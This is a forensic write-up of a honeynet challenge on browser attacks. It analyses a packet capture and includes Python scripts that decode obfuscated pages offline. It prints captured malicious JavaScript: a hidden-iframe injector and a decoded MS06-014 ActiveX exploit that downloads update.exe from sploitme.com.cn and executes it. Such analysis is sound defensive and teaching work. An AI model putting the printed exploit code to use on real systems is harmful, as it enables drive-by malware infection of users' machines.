Challenge 2 of the Forensic Challenge 2010 – browsers under attack

This is the second challenge. It is the kind of problem I usually analyse, so I think I enjoyed solving it.
URL : http://www.honeynet.org/challenges/2010_2_browsers_under_attack

1. List the protocols found in the capture. What protocol do you think the attack is/are based on? (2pts)

The capture contains 745 packets in total; 553 of them are TCP, and 126 of those are HTTP.
So the attack appears to have been carried out over HTTP.
This can be checked in Wireshark through the "Protocol Hierarchy" menu.

2. List IPs, hosts names / domain names. What can you tell about it - extrapolate? What to deduce from the setup? Does it look like real situations? (4pts)

Hmm?

3. List all the web pages. List those visited containing suspect and possibly malicious javascript and who's is connecting to it? Briefly describe the nature of the malicious web pages (6pts)

The hosts with access records in this dump are listed below.

rapidshare.com.eyu32.ru
sploitme.com.cn
www.honeynet.org
www.google-analytics.com
www.google.com
www.google.fr
clients1.google.fr
shop.honeynet.sg

Among these, the page source of rapidshare.com.eyu32.ru/login.php contains the following code.

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('q.r(s("%h%0%6%d%e%7%1%8%9%d%3%4%a%5%2%2%i%j%b%b%9%i%c%k%0%2%7%1%l%3%k%7%l%3%m%b%t%3%c%0%3%u%4%v%6%1%f%w%e%x%f%y%6%a%z%0%g%2%5%4%n%8%5%1%0%A%5%2%4%n%8%9%2%o%c%1%4%a%B%0%9%0%f%0%c%0%2%o%j%8%5%0%g%g%1%m%a%p%h%b%0%6%d%e%7%1%p%C"));',39,39,'69|65|74|63|3D|68|66|6D|20|73|22|2F|6C|72|61|62|64|3C|70|3A|6F|2E|6E|31|79|3E|document|write|unescape|3F|6B|33|35|36|32|77|67|76|0A'.split('|'),0,{}));

Unpacking this code yields the following.

<iframe src="http://sploitme.com.cn/?click=3feb5a6b2f"width=1 height=1 style="visibility: hidden"></iframe> 
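The unpacking can be done statically, without loading the page in a browser. The following Python script is an added example (my own code, not part of the original write-up or of the challenge material): it re-implements the word substitution of the p,a,c,k,e,r packer, statically evaluates the `unescape()` literal that the unpacked code passes to `document.write`, and flags hidden or 1x1 iframes, the usual drive-by redirect pattern. The packed string is the one shown above; the function names and the "hidden iframe" heuristic are my own.

```python
import re

# Packed script taken from rapidshare.com.eyu32.ru/login.php in the challenge capture
# (copied from the write-up above; this is the sample under analysis, not new code).
PACKED = r"""eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('q.r(s("%h%0%6%d%e%7%1%8%9%d%3%4%a%5%2%2%i%j%b%b%9%i%c%k%0%2%7%1%l%3%k%7%l%3%m%b%t%3%c%0%3%u%4%v%6%1%f%w%e%x%f%y%6%a%z%0%g%2%5%4%n%8%5%1%0%A%5%2%4%n%8%9%2%o%c%1%4%a%B%0%9%0%f%0%c%0%2%o%j%8%5%0%g%g%1%m%a%p%h%b%0%6%d%e%7%1%p%C"));',39,39,'69|65|74|63|3D|68|66|6D|20|73|22|2F|6C|72|61|62|64|3C|70|3A|6F|2E|6E|31|79|3E|document|write|unescape|3F|6B|33|35|36|32|77|67|76|0A'.split('|'),0,{}));"""

BASE36 = "0123456789abcdefghijklmnopqrstuvwxyz"


def packer_token(c, a):
    """Re-implements the packer's e(c): the short token that stands for word index c.
    Indices below 36 become a base-36 digit, 36 and above become 'A', 'B', ... ."""
    prefix = "" if c < a else packer_token(c // a, a)
    c %= a
    return prefix + (chr(c + 29) if c > 35 else BASE36[c])


def unpack(packed):
    """Recover the original script from eval(function(p,a,c,k,e,r){...}(p,a,c,k.split('|'),0,{}))."""
    m = re.search(r"\}\('(.*?)',(\d+),(\d+),'(.*?)'\.split\('\|'\)", packed, re.S)
    if not m:
        raise ValueError("not a p,a,c,k,e,r packed script")
    p, a, c, k = m.group(1), int(m.group(2)), int(m.group(3)), m.group(4).split("|")
    # One dictionary and a single pass: the same result as the packer's own loop,
    # without the order dependence of replacing token after token.
    table = {}
    for i in range(c):
        token = packer_token(i, a)
        table[token] = k[i] if i < len(k) and k[i] else token
    return re.sub(r"\b\w+\b", lambda w: table.get(w.group(0), w.group(0)), p)


def js_unescape(s):
    """JavaScript unescape(): %uXXXX and %XX sequences back to characters."""
    return re.sub(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def recover_injected_html(packed):
    """Unpack, then statically evaluate the document.write(unescape("...")) call
    instead of letting a browser do it."""
    unpacked = unpack(packed)
    m = re.search(r'unescape\("([^"]*)"\)', unpacked)
    if not m:
        raise ValueError("no unescape() literal in unpacked script: " + unpacked)
    return js_unescape(m.group(1))


def hidden_iframe_targets(html):
    """src URLs of iframes that are hidden or 1x1, the drive-by redirect pattern (my heuristic)."""
    targets = []
    for tag in re.findall(r"<iframe\b[^>]*>", html, re.I):
        src = re.search(r'src\s*=\s*"([^"]+)"', tag, re.I)
        hidden = re.search(r"visibility:\s*hidden|display:\s*none|width=[\"']?1\b|height=[\"']?1\b", tag, re.I)
        if src and hidden:
            targets.append(src.group(1))
    return targets


if __name__ == "__main__":
    html = recover_injected_html(PACKED)
    print(html)
    print("redirect targets:", hidden_iframe_targets(html))
```

Run it with `python3`; it prints the recovered iframe and the redirect target without ever executing the attacker's JavaScript. Substituting all tokens from one dictionary in a single pass is what the packer itself does when `''.replace(/^/,String)` is falsy, and it sidesteps the token-order subtleties of the `while(c--)` fallback loop.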

This iframe makes the browser request http://sploitme.com.cn/?click=3feb5a6b2f.
That request is answered with a 302 redirect; the request and response are shown below.

GET /?click=3feb5a6b2f HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://rapidshare.com.eyu32.ru/login.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sploitme.com.cn
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Tue, 02 Feb 2010 19:05:43 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.6
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: http://sploitme.com.cn/fg/show.php?s=3feb5a6b2f
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

The Location header sends the browser on to http://sploitme.com.cn/fg/show.php?s=3feb5a6b2f, whose page source is as follows.

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<meta name="robots" content="noindex">
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /fg/show.php?s=3feb5a6b2f was not found on this server.</p>

<script language='JavaScript'>
<!--
var CRYPT={signature:'CGerjg56R',_keyStr:'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',decode:function(input){var output='';var chr1,chr2,chr3;var enc1,enc2,enc3,enc4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i<input.length){enc1=this._keyStr.indexOf(input.charAt(i++));enc2=this._keyStr.indexOf(input.charAt(i++));enc3=this._keyStr.indexOf(input.charAt(i++));enc4=this._keyStr.indexOf(input.charAt(i++));chr1=(enc1<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;output=output+String.fromCharCode(chr1);if(enc3!=64){output=output+String.fromCharCode(chr2);}
if(enc4!=64){output=output+String.fromCharCode(chr3);}}
output=CRYPT._utf8_decode(output);return output;},_utf8_decode:function(utftext){var string='';var i=0;var c=0,c1=0,c2=0,c3=0;while(i<utftext.length){c=utftext.charCodeAt(i);if(c<128){string+=String.fromCharCode(c);i++;}else if((c>191)&&(c<224)){c2=utftext.charCodeAt(i+1);string+=String.fromCharCode(((c&31)<<6)|(c2&63));i+=2;}else{c2=utftext.charCodeAt(i+1);c3=utftext.charCodeAt(i+2);string+=String.fromCharCode(((c&15)<<12)|((c2&63)<<6)|(c3&63));i+=3;}}
return string;},obfuscate:function(str){var container='';for(var i=0,z=0;i<str.length;i=i+3,z++){container+=String.fromCharCode(str.substring(i,i+3)-this.signature.substring(z%this.signature.length,z%this.signature.length+1).charCodeAt(0));}
return CRYPT.decode(container);}}
eval(CRYPT.obfuscate('1571811872311951541351661801171232041951561601691531531871792011851912141281421981891611891961912001401031901651221871621811701531691801171492052141772111711521871201822002231922121261221301701442101842112011041401301461801752291951901061681561881902221911741681721291661831281682231961521511631601151681881712231761221321931571581792281891891181651571551871512031941761561531911531911812011591521511252011221711731881592041041281901661551502311961911521571631541491492111941931611411511241761982231922091531211851721551891921582011401732031431792051921901721571391681371362061891902191101431321371191901642092141431371901221711731881592041041281901661551502311961911521571631541491492111941931611411511241761982231922091531211851721551882222122021621112041651211911621822111571321661361751862001761681581291661831281901641761511421041851781611842221612031251281351681221752222051871021711721551702042011751521301371541491192001841802111521421681751701521952171781371701391561211711621951531561651721501791562161941521101211911751801761861802111521381301241692112002212011201622031571591831632052121051591591341441562132151891731301911241901912011582141261611821371571681872211761581111911571921582362031741101051581771372122131741601631441701491731902012182071541221301871452111871631761581701601561591832251822131271581801761532192121892061651301531571751991861842111281381981881611891832232021031401991571382052312061901731691571511872132042112071741441701361882002231922251521251391841701512001911931411581301471551492191831861261661831181452092141781891741521871331192002241922111321051311751691731922142041041281901671431872352042081191631711541912232041902191101561631791211902021792061531421561821711721712152001401741901471542012252061751351731611721272192131571691681521321751191992011912201421041391831472101922231791031441921431212212321951901341711811381752201941561881101311651661262012231762241261251721791691722002231921401031901471542011632051741351581821381562
18204194207161128204183180201201159209153125190185169206180174202162140186167142187194181174109169180172179156214215173174127154140128199224192218151122198115170211222161202159103200143178179235196190123102172152128206211215189159154149171188176202155209142142164173168168218214178141170139134180209223181170123175157155187149213216211108153188116189177221184224143141152115161186171211200162140188167138205231182170152164157155120207203194185159151149171179176202222160155135194179161206217210202158162137167143175167207154126111180188124169213215189157154153153151190223218211142105163178169206233216177174173192141192209171195153123102171117174212204189211108156170115146198201195214126142155179172152196227204141170203147158157231188153139102166117145214204193181101129149166181177185158215155141160171171172192217178124139194168122150171173212161163157134141222189194219101153192175126200220155221129161182175171170171211200162140188167138205231182170152164157155120207203194185159151149171179176202222160155135194179161206217210202158162137167143175167207154126111180188124173204194185133143191179179190165187214151159190124160151184154192103157193157154209169208191101129181176157149214194177170127154140126203195218212153141135173171172222224201158120154165192205218181191169104171155144204213228152121153191153175201185192183128125151182145150214190192104128194166143182231191153157162180138190211189190219103143170140174199236155171152163168171171172200186178124123197141119171183190151135121158175149149213215189157152165166183180165196207152159148175151189191223185140107132164159175232204212102162180177152212188155169174152132145179200165183213128138198117160189187209204124158203147158154163204174172109182176141222187177177165152188116179177221214151143141130178145150196176187139119192142154216224194173172164157117161213212177189170143169116179180165188224154142198119168173187163201162140133140141205192190172157102182139137184204194173102144170145119176181213158155135194173160189
19621220012015819014215921716220521316110918313817522219419315616115420313313719016518821515316316815615515118821919314013213014213820119220319013117518011814921920421618417014115111614818418418818813812118117915015216218119210312413015612120422519618616110918313817522219419315616115420313313719016518821515316316815615515118821919314013213014213820119219115215713216613514421819915618917415419115319218818315518013612416415215616821321818210410313913418020922318117012310617913914421321321518910115417014118817618217121513210518617817020616722420212414019914213820118618818913416415813915722221217818517114419117518619119722621214214120218916118422118120412415820314318117922220421213416518017715721621217321010815419113719217418519621515112516817316915116715419314010713014715920522520520810617517215514922021215615617514416714118919118621315815117513515217218918021418313712313716519215419220415313516216215114815621222715613315315315318817618121315815117513515517021022215419313615819116415822122219515311017118213815721821417321010815220312015519020219621113912513913816818823421417812412819416517622023518118716917615817514515021221120715815116911918617818121315815513519417617118816721220312416220016517616723019617412316015713417915621421517317412715317412817818222215314214215517016915118821919314013213016619315023119619115215716315514522220319421016412813318313818318221315313417616711614920616215618113812320414315517023418817111817016115117422319518915117213115114419017918319617113016019013714822320416317717417319216811917518318518714312216015115615119019019210213516614418717819817617213012113012015016919217217913711920114819316616218821013017516115215622319221615116313014916712618219917915613416116013715317019522218513813113314915414916218415113817415815117822319121217616913615014913717822017522213116015111814818518315620513615319714112221623318317111810416417313622319122715117213115013219017719817122213012214718315222317922518012010220114413916623318317111817315913513622019
21741931101282031861812022361712221301221721381481691921721791371192011441391662301831711181731591341201691911741681721301661321901781821712221301221471861481691791541811631021921431382011691842121381761591731361521911771721691322041561211911811541511431411671171471852171571821401311981571421782341962121221071591541522222042151801751561651661861751652211531311221511151491851832271841581031491461552001661821871341031591521522171951901691221331491161421821621961721351601591891531852172281801011321391411922202242072251531251601521441521962121921751301671561901792211952191311221591891481841621581841371271321431551782361851881381731591151482201951911881751361541151811771812061581301221711181482071921761801211611981491771831821832081011021591171481531901902061751321661701871781822141741341021631871531701872251811751431321691542002291801541681041591891791721922281761021361871151911822201801721291381631191482231832221841371621531491381491661842251341061601351701511931741761721311661331281752352252131541021561331481691831581811371611351431551711831872091301701601351532101931891511051311301401191771981871531301381631161491701911581811221281531461431492241821701531091641351371691911742031221321661561871791621831531321371301151481492032261791381271301481551662301832091391251601521402211911911931191351881361242031972052181271051981371501701921741841011361511491761501821871871261061581511521541922151761691351881321201781811541531341761471181522232211561801591351331451781751711802241731711821541912161891902191041511531751861911972102211421631941751601521962281901031621821421592171641951911261571711511202182141932231681331321751801761851632081501631681731711731922042001391021991661221872192051541351751791541242111891741681681311651741281811972061581271751901221601851632132011031321311651581872312061701061601811761572052141771891231521531531871912011591511281211821851602102262141921041351921421552172181822131311621821361411492141781771651431921531191911972092131421042021711701521922
18193120153197141121179229205153161161161172170215212156177166144169145119200163222215141137135189171188188228203125128194165180200225183186173172171176183209203157185175141132175171177223226211151163182115168168162226178136161137169158187229205153139109182139145154215156172110152191153122174183176209153125190117161187218186192162166190156122182225204153127167172154149149213155219165142165174126203201184207153125160178146172199218204104103139134180209223181174122166183118153222215194219103143170140174190220155171152163168171171172200186178124123197141120201198195154127166181139152218199156207161152153186181176198222215143159186172146189230218193158158154165192205218181186161109179154160212195156207161143132183145186181209215128142198135169151163225201124140130157154204226185154102162180139149209215154181171152170133186191202188211128121189122173182226227193141136131166180153217206175127103172151187158216194152159143170149177198181210211128142198124173182226218178174169137169152213182204153102173180138157149204189206165133133115146199201188207142175185179150220175167'));
//-->
</script>
<noscript></noscript>
</body></html>

Decoding this code produces the following.

function Complete(){setTimeout('location.href = "about:blank',2000);}
function CheckIP(){var req=null;try{req=new ActiveXObject("Msxml2.XMLHTTP");}catch(e){try{req=new ActiveXObject("Microsoft.XMLHTTP");}catch(e){try{req=new XMLHttpRequest();}catch(e){}}}
if(req==null)return"0";req.open("GET","/fg/show.php?get_ajax=1&r="+Math.random(),false);req.send(null);if(req.responseText=="1"){return true;}else{return false;}}
var urltofile='http://sploitme.com.cn/fg/load.php?e=1';var filename='update.exe';function CreateO(o,n){var r=null;try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,'')}catch(e){}}
if(!r){try{r=o.CreateObject(n,'','')}catch(e){}}
if(!r){try{r=o.GetObject('',n)}catch(e){}}
if(!r){try{r=o.GetObject(n,'')}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return r;}
function Go(a){var s=CreateO(a,'WScript.Shell');var o=CreateO(a,'ADODB.Stream');var e=s.Environment('Process');var xhr=null;var bin=e.Item('TEMP')+'\\'+filename;try{xhr=new XMLHttpRequest();}
catch(e){try{xhr=new ActiveXObject('Microsoft.XMLHTTP');}
catch(e){xhr=new ActiveXObject('MSXML2.ServerXMLHTTP');}}
if(!xhr)return(0);xhr.open('GET',urltofile,false)
xhr.send(null);var filecontent=xhr.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(filecontent);o.SaveToFile(bin,2);s.Run(bin,0);}
function mdac(){var i=0;var objects=new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);while(objects[i]){var a=null;if(objects[i].substring(0,1)=='{'){a=document.createElement('object');a.setAttribute('classid','clsid:'+objects[i].substring(1,objects[i].length-1));}else{try{a=new ActiveXObject(objects[i]);}catch(e){}}
if(a){try{var b=CreateO(a,'WScript.Shell');if(b){if(Go(a)){if(CheckIP()){Complete();}else{Complete();}
return true;}}}catch(e){}}
i++;}
Complete();}
mdac();

The code above appears to exploit the MS06-014 vulnerability to download the file at http://sploitme.com.cn/fg/load.php?e=1, save it as update.exe and execute it.
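Decoding the CRYPT layer can also be scripted rather than done by running the page. The script below is an added example (my own, not from the write-up or the challenge): it re-implements what `CRYPT.obfuscate()` does to its argument, that is, subtract the char code of the cycling signature character from each three-digit group to recover base64, then base64-decode and read the result as UTF-8, and it pulls the ActiveX CLSIDs and URLs out of the decoded stage so they can be matched against the per-function table given later in this write-up. The signature `CGerjg56R` and the digit blob are copied from the page (the blob is joined from the lines it is wrapped over); the decoder tolerates a damaged blob in the same way the page's own loop does, and the helper names are mine.

```python
import base64
import re

# Parameters copied from the CRYPT object in the fake-404 page shown above.
SIGNATURE = "CGerjg56R"

# The digit string passed to CRYPT.obfuscate(), copied verbatim from the page.
# The page shows it wrapped over several lines; they are joined here.
BLOB = "".join((
    "1571811872311951541351661801171232041951561601691531531871792011851912141281421981891611891961912001401031901651221871621811701531691801171492052141772111711521871201822002231922121261221301701442101842112011041401301461801752291951901061681561881902221911741681721291661831281682231961521511631601151681881712231761221321931571581792281891891181651571551871512031941761561531911531911812011591521511252011221711731881592041041281901661551502311961911521571631541491492111941931611411511241761982231922091531211851721551891921582011401732031431792051921901721571391681371362061891902191101431321371191901642092141431371901221711731881592041041281901661551502311961911521571631541491492111941931611411511241761982231922091531211851721551882222122021621112041651211911621822111571321661361751862001761681581291661831281901641761511421041851781611842221612031251281351681221752222051871021711721551702042011751521301371541491192001841802111521421681751701521952171781371701391561211711621951531561651721501791562161941521101211911751801761861802111521381301241692112002212011201622031571591831632052121051591591341441562132151891731301911241901912011582141261611821371571681872211761581111911571921582362031741101051581771372122131741601631441701491731902012182071541221301871452111871631761581701601561591832251822131271581801761532192121892061651301531571751991861842111281381981881611891832232021031401991571382052312061901731691571511872132042112071741441701361882002231922251521251391841701512001911931411581301471551492191831861261661831181452092141781891741521871331192002241922111321051311751691731922142041041281901671431872352042081191631711541912232041902191101561631791211902021792061531421561821711721712152001401741901471542012252061751351731611721272192131571691681521321751191992011912201421041391831472101922231791031441921431212212321951901341711811381752201941561881101311651661262012231762241261251721791691722002231921401031901471542011632051741351581821381562",
    "18204194207161128204183180201201159209153125190185169206180174202162140186167142187194181174109169180172179156214215173174127154140128199224192218151122198115170211222161202159103200143178179235196190123102172152128206211215189159154149171188176202155209142142164173168168218214178141170139134180209223181170123175157155187149213216211108153188116189177221184224143141152115161186171211200162140188167138205231182170152164157155120207203194185159151149171179176202222160155135194179161206217210202158162137167143175167207154126111180188124169213215189157154153153151190223218211142105163178169206233216177174173192141192209171195153123102171117174212204189211108156170115146198201195214126142155179172152196227204141170203147158157231188153139102166117145214204193181101129149166181177185158215155141160171171172192217178124139194168122150171173212161163157134141222189194219101153192175126200220155221129161182175171170171211200162140188167138205231182170152164157155120207203194185159151149171179176202222160155135194179161206217210202158162137167143175167207154126111180188124173204194185133143191179179190165187214151159190124160151184154192103157193157154209169208191101129181176157149214194177170127154140126203195218212153141135173171172222224201158120154165192205218181191169104171155144204213228152121153191153175201185192183128125151182145150214190192104128194166143182231191153157162180138190211189190219103143170140174199236155171152163168171171172200186178124123197141119171183190151135121158175149149213215189157152165166183180165196207152159148175151189191223185140107132164159175232204212102162180177152212188155169174152132145179200165183213128138198117160189187209204124158203147158154163204174172109182176141222187177177165152188116179177221214151143141130178145150196176187139119192142154216224194173172164157117161213212177189170143169116179180165188224154142198119168173187163201162140133140141205192190172157102182139137184204194173102144170145119176181213158155135194173160189",
    "19621220012015819014215921716220521316110918313817522219419315616115420313313719016518821515316316815615515118821919314013213014213820119220319013117518011814921920421618417014115111614818418418818813812118117915015216218119210312413015612120422519618616110918313817522219419315616115420313313719016518821515316316815615515118821919314013213014213820119219115215713216613514421819915618917415419115319218818315518013612416415215616821321818210410313913418020922318117012310617913914421321321518910115417014118817618217121513210518617817020616722420212414019914213820118618818913416415813915722221217818517114419117518619119722621214214120218916118422118120412415820314318117922220421213416518017715721621217321010815419113719217418519621515112516817316915116715419314010713014715920522520520810617517215514922021215615617514416714118919118621315815117513515217218918021418313712313716519215419220415313516216215114815621222715613315315315318817618121315815117513515517021022215419313615819116415822122219515311017118213815721821417321010815220312015519020219621113912513913816818823421417812412819416517622023518118716917615817514515021221120715815116911918617818121315815513519417617118816721220312416220016517616723019617412316015713417915621421517317412715317412817818222215314214215517016915118821919314013213016619315023119619115215716315514522220319421016412813318313818318221315313417616711614920616215618113812320414315517023418817111817016115117422319518915117213115114419017918319617113016019013714822320416317717417319216811917518318518714312216015115615119019019210213516614418717819817617213012113012015016919217217913711920114819316616218821013017516115215622319221615116313014916712618219917915613416116013715317019522218513813113314915414916218415113817415815117822319121217616913615014913717822017522213116015111814818518315620513615319714112221623318317111810416417313622319122715117213115013219017719817122213012214718315222317922518012010220114413916623318317111817315913513622019",
    "21741931101282031861812022361712221301221721381481691921721791371192011441391662301831711181731591341201691911741681721301661321901781821712221301221471861481691791541811631021921431382011691842121381761591731361521911771721691322041561211911811541511431411671171471852171571821401311981571421782341962121221071591541522222042151801751561651661861751652211531311221511151491851832271841581031491461552001661821871341031591521522171951901691221331491161421821621961721351601591891531852172281801011321391411922202242072251531251601521441521962121921751301671561901792211952191311221591891481841621581841371271321431551782361851881381731591151482201951911881751361541151811771812061581301221711181482071921761801211611981491771831821832081011021591171481531901902061751321661701871781822141741341021631871531701872251811751431321691542002291801541681041591891791721922281761021361871151911822201801721291381631191482231832221841371621531491381491661842251341061601351701511931741761721311661331281752352252131541021561331481691831581811371611351431551711831872091301701601351532101931891511051311301401191771981871531301381631161491701911581811221281531461431492241821701531091641351371691911742031221321661561871791621831531321371301151481492032261791381271301481551662301832091391251601521402211911911931191351881361242031972052181271051981371501701921741841011361511491761501821871871261061581511521541922151761691351881321201781811541531341761471181522232211561801591351331451781751711802241731711821541912161891902191041511531751861911972102211421631941751601521962281901031621821421592171641951911261571711511202182141932231681331321751801761851632081501631681731711731922042001391021991661221872192051541351751791541242111891741681681311651741281811972061581271751901221601851632132011031321311651581872312061701061601811761572052141771891231521531531871912011591511281211821851602102262141921041351921421552172181822131311621821361411492141781771651431921531191911972092131421042021711701521922",
    "18193120153197141121179229205153161161161172170215212156177166144169145119200163222215141137135189171188188228203125128194165180200225183186173172171176183209203157185175141132175171177223226211151163182115168168162226178136161137169158187229205153139109182139145154215156172110152191153122174183176209153125190117161187218186192162166190156122182225204153127167172154149149213155219165142165174126203201184207153125160178146172199218204104103139134180209223181174122166183118153222215194219103143170140174190220155171152163168171171172200186178124123197141120201198195154127166181139152218199156207161152153186181176198222215143159186172146189230218193158158154165192205218181186161109179154160212195156207161143132183145186181209215128142198135169151163225201124140130157154204226185154102162180139149209215154181171152170133186191202188211128121189122173182226227193141136131166180153217206175127103172151187158216194152159143170149177198181210211128142198124173182226218178174169137169152213182204153102173180138157149204189206165133133115146199201188207142175185179150220175167",
))


def crypt_layer1(blob, signature=SIGNATURE):
    """Undo the outer layer: each 3-digit group minus the char code of the cycling
    signature character is one base64 character (the page's CRYPT.obfuscate loop)."""
    chars = []
    for z, i in enumerate(range(0, len(blob), 3)):
        value = int(blob[i:i + 3]) - ord(signature[z % len(signature)])
        if value > 0:  # a non-positive value means the blob is damaged at this point; skip it
            chars.append(chr(value))
    return "".join(chars)


def lenient_b64decode(text):
    """Base64 decode that, like the page's CRYPT.decode loop, ignores stray characters
    and tolerates missing padding."""
    text = re.sub(r"[^A-Za-z0-9+/]", "", text)
    if len(text) % 4 == 1:  # a lone trailing character cannot encode a byte
        text = text[:-1]
    return base64.b64decode(text + "=" * (-len(text) % 4))


def crypt_deobfuscate(blob, signature=SIGNATURE):
    """Equivalent of CRYPT.obfuscate(blob): layer 1, then base64, then UTF-8."""
    return lenient_b64decode(crypt_layer1(blob, signature)).decode("utf-8", errors="replace")


CLSID_RE = re.compile(r"[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def triage(js):
    """Indicators to pull from a decoded stage: ActiveX CLSIDs probed and URLs contacted."""
    return {
        "clsids": sorted({m.upper() for m in CLSID_RE.findall(js)}),
        "urls": sorted(set(URL_RE.findall(js))),
    }


if __name__ == "__main__":
    decoded = crypt_deobfuscate(BLOB)
    print(decoded)
    print(triage(decoded))
```

The three-digit groups with a per-position offset are not encryption, only a way to keep the base64 out of sight of simple string searches; once the signature is read off the `CRYPT` object the whole stage decodes offline, and the CLSIDs it probes are the fastest way to name the vulnerabilities it targets.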

In addition, later packets show an access to http://sploitme.com.cn/fg/show.php?s=84c090bd86 as well.
That page's code adds several more exploits to the code above. Deobfuscated, it looks like this.

function Complete(){setTimeout('location.href = "about:blank',2000);}
function CheckIP(){var req=null;try{req=new ActiveXObject("Msxml2.XMLHTTP");}catch(e){try{req=new ActiveXObject("Microsoft.XMLHTTP");}catch(e){try{req=new XMLHttpRequest();}catch(e){}}}
if(req==null)return"0";req.open("GET","/fg/show.php?get_ajax=1&r="+Math.random(),false);req.send(null);if(req.responseText=="1"){return true;}else{return false;}}
var urltofile='http://sploitme.com.cn/fg/load.php?e=1';var filename='update.exe';function CreateO(o,n){var r=null;try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,'')}catch(e){}}
if(!r){try{r=o.CreateObject(n,'','')}catch(e){}}
if(!r){try{r=o.GetObject('',n)}catch(e){}}
if(!r){try{r=o.GetObject(n,'')}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return r;}
function Go(a){var s=CreateO(a,'WScript.Shell');var o=CreateO(a,'ADODB.Stream');var e=s.Environment('Process');var xhr=null;var bin=e.Item('TEMP')+'\\'+filename;try{xhr=new XMLHttpRequest();}
catch(e){try{xhr=new ActiveXObject('Microsoft.XMLHTTP');}
catch(e){xhr=new ActiveXObject('MSXML2.ServerXMLHTTP');}}
if(!xhr)return(0);xhr.open('GET',urltofile,false)
xhr.send(null);var filecontent=xhr.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(filecontent);o.SaveToFile(bin,2);s.Run(bin,0);}
function mdac(){var i=0;var objects=new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);while(objects[i]){var a=null;if(objects[i].substring(0,1)=='{'){a=document.createElement('object');a.setAttribute('classid','clsid:'+objects[i].substring(1,objects[i].length-1));}else{try{a=new ActiveXObject(objects[i]);}catch(e){}}
if(a){try{var b=CreateO(a,'WScript.Shell');if(b){if(Go(a)){if(CheckIP()){Complete();}else{aolwinamp();}
return true;}}}catch(e){}}
i++;}
aolwinamp();}
